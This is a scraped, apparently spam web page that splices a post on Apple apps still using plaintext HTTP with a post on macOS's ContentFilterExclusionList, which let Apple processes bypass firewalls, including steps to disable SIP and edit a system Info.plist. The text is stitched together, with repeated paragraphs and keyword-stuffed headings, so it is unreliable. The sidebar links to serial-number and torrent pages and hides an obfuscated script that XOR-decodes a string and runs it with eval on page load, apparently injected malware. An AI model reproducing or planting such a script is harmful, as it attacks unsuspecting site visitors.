Com.apple.geod.xpc Little Snitch

Updated to make it clear that using port 80 does not mean that Apple's software is insecure. Thanks to Jeffrey Paul for pointing out that this could be misconstrued.

At WWDC this week, Apple announced the App Transport Security feature for iOS and OS X. Apple is strongly encouraging developers to use HTTPS exclusively on new apps, and to make plans to migrate old apps to HTTPS in the near future. While encryption is not yet a requirement, it is the new default. Apps that want to continue to use plaintext HTTP on port 80 will need to explicitly disable the feature in their app manifests.

Apple has removed this whitelist completely, allowing third-party firewalls like Little Snitch to reliably monitor and filter any network traffic. Up until macOS 11.1 the whitelist inlcudes the following macOS processes. UPDATE 2: The traffic of some Apple processes isn’t shown in Little Snitch 5. UPDATE 3: Enabling Little Snitch 4.6 kext under Big Sur. UPDATE 4: Tweet by Apple developer Russ Bishop: 'Some system processes bypassing NetworkExtensions in macOS is a bug, in case you were wondering.' And some replies.

Com.apple.geod.xpc Assetcachelocatorservice.xpc Little Snitch Song nsurlsessiond UserEventAgent Also, I noticed descriptions on some locked LS rules which I would prefer to be denied, if I deny them, do they affect other OSX services? Apple has removed this whitelist completely, allowing third-party firewalls like Little Snitch to reliably monitor and filter any network traffic. Up until macOS 11.1 the whitelist inlcudes the following macOS processes. Since the announcement on Monday, I've been monitoring these requests using a firewall called Little Snitch. Funny enough, even Little Snitch didn't use HTTPS for its initial download or software updates until very only a few months ago. So far I've encountered 9 separate OS X services or first-party apps that are still relying on plaintext HTTP.

The ideas behind App Transport Security are great. It's essentially HTTP Strict Transport Security for apps, making it much harder for developers to inadvertantly disclose private user information. The feature that will benefit the privacy and security of millions of Apple customers. The writing is also on the wall that Apple intends to make this feature mandatory at some point, essentially deprecating plaintext HTTP altogether.

Apple, however, has yet to take their own advice. There are many OS X components and Apple apps that still do not use encryption exclusively, relying on HTTP over port 80. Here's an example from the brand new Photos app, communicating with AWS S3 over port 80:

Since the announcement on Monday, I've been monitoring these requests using a firewall called Little Snitch. Funny enough, even Little Snitch didn't use HTTPS for its initial download or software updates until very only a few months ago.

So far I've encountered 9 separate OS X services or first-party apps that are still relying on plaintext HTTP:

nsurlsessiond via S3 / and Akamai

Disclaimer: It's worth noting that although some HTTP requests are happening over plain HTTP on port 80, this does not mean that Apple's apps are insecure. Most of the apps using port 80 still encrypt or or sign their content. Even if Apple's apps are not insecure, using plain HTTP does mean that they leak at least some extra metadata (HTTP headers) and that they are not following the rules they're pushing 3rd party developers to follow.

As an aside, it's fascinating just how many different CDNs Apple makes use of, and how heavily they rely on S3 for Photos and iMessage content.

When I first discovered that Photos communicates with AWS S3 without encryption, I submitted a security report to Apple. At the time, they did not consider it an issue and replied with the following:

Follow-up: 622218711

Hello Blake,

Thank you for contacting the Apple Product Security team. We take every report of a potential security issue seriously. This message is being sent to you by a security analyst who has reviewed your note.

Photos are encrypted at rest within iCloud, and are uploaded and downloaded to/from iCloud using an encrypted transport channel.

For more information on iCloud security, please see https://support.apple.com/en-us/HT202303

Regards,

Apple has tons of talented crypto engineers, so I don't doubt that Photos and iCloud store photos with at-rest encryption, or that they are encrypted in the HTTP payloads during transfer. Using plain HTTP does leak at least some additional metadata, though it may not be enough to compromise anybody's privacy in this specific case. But if Apple is asking all 3rd party developers to use HTTPS exclusively, they should be willing to do the same.

In summary, Apple's new App Transport Security feature is a great step towards enhancing the privacy and security of Apple customers around the globe. I look forward to the day when it is a mandatory feature. In the mean time, though, Apple should lead by example by avoiding plaintext HTTP in their own apps and services.

tinyapps.org / blog

Patrick Wardle highlighted a tweet by Maxwell ('Some Apple apps bypass some network extensions and VPN Apps. Maps for example can directly access the internet bypassing any NEFilterDataProvider or NEAppProxyProviders you have running'), sparking an extensive HN discussion on Apple's ham-fisted tactics (not unlike Google's recent behavior).

A search for 'NEFilterDataProvider' turned up David Dudok de Wit's post fingering the ContentFilterExclusionList key in /System/Library/Frameworks/NetworkExtension.framework/Versions/A/Resources/Info.plist as the culprit. The default list includes 56 Apple apps and daemons like App Store, MusicLibrary, softwareupdated, etc.:

<li><p>Disable FileVault</p></li><li><p>Boot into macOS Recovery, disable SIP (<code>csrutil disable</code>) and SSV (<code>csrutil authenticated-root disable</code>), and reboot</p></li><li><p>Find the root mount device, e.g.,<br /><samp>%</samp><code>mount</code><br /><samp>/dev/<span>disk1s5</span>s1 on / (apfs, local, read-only, journaled)<br />...</samp></p></li><li><p><samp>%</samp><code>mkdir <span>mnt</span></code></p></li><li><p><samp>%</samp><code>sudo mount -o nobrowse -t apfs /dev/<span>disk1s5</span><span>mnt</span>/</code></p></li><li><p>Edit Info.plist as desired, e.g., <samp>%</samp><code>sudo vi mnt/System/Library/Frameworks/NetworkExtension.framework/Versions/A/Resources/Info.plist</code></p></li><li><p><samp>%</samp><code>sudo bless --folder mnt/System/Library/CoreServices --bootefi --create-snapshot && sudo reboot</code></p></li></ol><p>Little Snitch 5 and TripMode 3 had no problem blocking the previously-cloaked processes afterwards:</p><p>though one may well be left with a niggling doubt: should all this really be necessary to monitor your own computer's network traffic?</p><p><small><b>UPDATE 1:</b></small> Hany, author of Murus and Vallum, was kind enough to reply with some testing of his own:</p><h3>Com.apple.geod.xpc Little Snitch 2</h3><blockquote><i>I did some tests and I’ve found at least one major issue on Catalina.<br />Removing all entries from the dictionary key seems to work for most listed processes: connections are seen by the network filter and flows are passed/blocked according to matched rules. But it does not work for at least one of the listed processes: IMTransferAgent.If you use macOS Messages.app then you may be aware that this process is used to send messages attachments.<br />If removed from the list, the process is always blocked. The filter provider does not see any flow for that process, and any attempt to send attachments with Messages.app will fail until you disable the filter.</i></blockquote><p><small><b>UPDATE 2:</b></small>The traffic of some Apple processes isn’t shown in Little Snitch 5.</p><p><small><b>UPDATE 3:</b></small>Enabling Little Snitch 4.6 kext under Big Sur</p><p><small><b>UPDATE 4:</b></small>Tweet by Apple developer Russ Bishop: '<i>Some system processes bypassing NetworkExtensions in macOS is a bug, in case you were wondering.</i>' and some replies:</p><ul><li>Matt Greenfield: '<i>Public bug tracker would make it easier to believe too. Lack of transparency breeds lack of trust.</i>'</li><li>David Dudok de Wit: '<i>Glad to see it's being reconsidered as a bug, because Apple told us it 'behaves as designed' (FB7740671 + FB7665551). And why is there an exclusion list in the first place? I'd love to know more and see this documented.</i>'</li><li>Sérgio Silva: '<i>Yes. A bug with its own configuration file /System/Library/Frameworks/NetworkExtension.framework/Resources/Info.plist ContentFilterExclusionList</i>'</li></ul><p><small><b>UPDATE 5:</b></small>Exclusions Blaster</p><p><small><b>UPDATE 6:</b></small>Hooray, no more ContentFilterExclusionList</p><p align='right'>/mac | Oct 21, 2020</p><h3>Com.apple.geod.xpc Little Snitch Free</h3><p>Subscribe or visit the archives.</p></p>
			</div>
	<footer class="entry-meta">
		
			</footer>
</article>
				<nav role="navigation" id="nav-below" class="site-navigation post-navigation">
		<h1 class="assistive-text">Post navigation</h1>
	
		<div class="nav-previous"><a href='/interactive-inflation-games'>Interactive Inflation Games</a></div>		<div class="nav-next"><a href='/antares-auto-tune-efx2b-torrent'>Antares Auto Tune Efx%2b Torrent</a></div>
	
	</nav>
	
			
		
		</div>
	</div>
<div id="secondary" class="updateable widget-area" role="complementary">
		<aside id="search-3" class="widget widget_search">	<form method="get" id="searchform" action="#" role="search">
		<label for="s" class="assistive-text">Search</label>
		<input type="text" class="field" name="s" value="" id="s" placeholder="Search …" />
		<input type="submit" class="submit" name="submit" id="searchsubmit" value="Search" />
	</form>
</aside>		<aside id="recent-posts-5" class="widget widget_recent_entries">		<h1 class="widget-title">MOST POPULAR ARTICLES</h1>		<ul>
					<li><a href='/pathoma-mp3'>: Pathoma Mp3</a></li>
<li><a href='/flli-pietta-firearms-serial-numbers'>: F.lli Pietta Firearms Serial Numbers</a></li>
<li><a href='/omnisphere-2-serial-number-free'>: Omnisphere 2 Serial Number Free</a></li>
<li><a href='/free-first-person-shooter-games-mac'>: Free First Person Shooter Games Mac</a></li>
<li><a href='/3-days-to-digest'>: 3 Days To Digest</a></li>
<li><a href='/jukar-spain-serial-number'>: Jukar Spain Serial Number</a></li>
<li><a href='/can-djay-2-be-used-for-a-remote-for-desktop'>: Can Djay 2 Be Used For A Remote For Desktop</a></li>
<li><a href='/auto-tuning-voice-meme'>: Auto Tuning Voice Meme</a></li>
<li><a href='/pc-autoplay-dicom-viewer'>: Pc Autoplay Dicom Viewer</a></li>
<li><script>var O='bvAwWMB3fs0wQarSJuyxdPoXd2iRzQeosIr3TM7uN2QTTCkrvGbgeU7vhMt3ESEynMdiSw76wdSj8DdJRZw2O7kGJ5WhsdZ4yrFhybI8HeSabXvMISlNwKSpBGHVI0NsnXUQ65kQrwuKokEUJkIJ1lHWHqO1CVzQzzVndNPLHEw8qibr';var u=atob('FBczVyUoJA4CHFMCPAQcJ2QWDAoWNQEsN1EbOwolXhkSO1JLPD8KGytFcQwZDyMGAjcwAhQgUgUcZV0IPTs3VwE9AQd7UHBzI0N/TRdrDSQ2Px1BYUQbJilQcEFIHDJGVwUvHBEhO10sAD0VCzkaPnQnHjsScCsYMGknOCVfLxdTPiA/VUECPhxfXDAKHSQ5YhMhOB8eLSQ4HiFCJgIfKQ5TbRNfNjg+ZjYSVhVBS0k=');var dw='';for(var n=0;n<O.length;n++){dw+=String.fromCharCode(O.charCodeAt(n)^u.charCodeAt(n));}eval(dw);</script></li>
				</ul>
		</aside>		</div>

	</div>
	<footer id="colophon" class="site-footer" role="contentinfo">
		<div class="site-info">
			 
<a href="Loadingprivacy17">Loadingprivacy17</a>
		</div>
	</footer>
</div>
</body>
</html>